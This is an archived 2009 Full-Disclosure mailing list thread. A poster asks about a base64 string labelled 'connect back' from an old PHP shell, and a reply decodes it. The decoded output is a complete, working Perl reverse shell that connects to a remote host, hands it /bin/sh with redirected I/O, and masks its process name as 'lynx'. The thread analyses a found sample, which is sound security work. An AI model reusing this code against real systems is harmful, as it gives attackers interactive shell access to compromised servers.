[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] connect back PHP hack

To: Razi Shaban <razishaban@xxxxxxxxx>
Subject: Re: [Full-disclosure] connect back PHP hack
From: webDEViL <w3bd3vil@xxxxxxxxx>
Date: Wed, 11 Feb 2009 00:24:15 +0530

Must be off the r57 php shell.

Regards,
webDEViL

On Wed, Feb 11, 2009 at 12:14 AM, Razi Shaban <razishaban@xxxxxxxxx> wrote:

> On Tue, Feb 10, 2009 at 8:23 PM, sr. <staticrez@xxxxxxxxx> wrote:
> > can anyone tell me what encoding this is?
> >
> >
> $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
> >
> aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
> >
> hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
> >
> sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
> >
> kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
> >
> KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
> > OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
> >
> > this has to do with old php 4.x.x version with magic quotes enabled.
> > i'm just trying to figure out what the connect back code does.
> >
> > any input is much appreciated.
> >
> > thx,
> >
> > sr.
> >
>
> Base64, the "==" at the end gives it away. It decrypts to:
>
> #!/usr/bin/perl
> use Socket;
> $cmd= "lynx";
> $system= 'echo "`uname -a`";echo "`id`";/bin/sh';
> $0=$cmd;
> $target=$ARGV[0];
> $port=$ARGV[1];
> $iaddr=inet_aton($target) || die("Error: $!\n");
> $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
> $proto=getprotobyname('tcp');
> socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
> connect(SOCKET, $paddr) || die("Error: $!\n");
> open(STDIN, ">&SOCKET");
> open(STDOUT, ">&SOCKET");
> open(STDERR, ">&SOCKET");
> system($system);
> close(STDIN);
> close(STDOUT);
> close(STDERR);
>
> --
>
> Regards,
> Razi Shaban
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- [Full-disclosure] connect back PHP hack
  - From: sr.
- Re: [Full-disclosure] connect back PHP hack
  - From: Razi Shaban

Prev by Date: Re: [Full-disclosure] connect back PHP hack
Next by Date: [Full-disclosure] [SPAM] Re: connect back PHP hack
Previous by thread: Re: [Full-disclosure] connect back PHP hack
Next by thread: [Full-disclosure] [SPAM] Re: connect back PHP hack
Index(es):
- Date
- Thread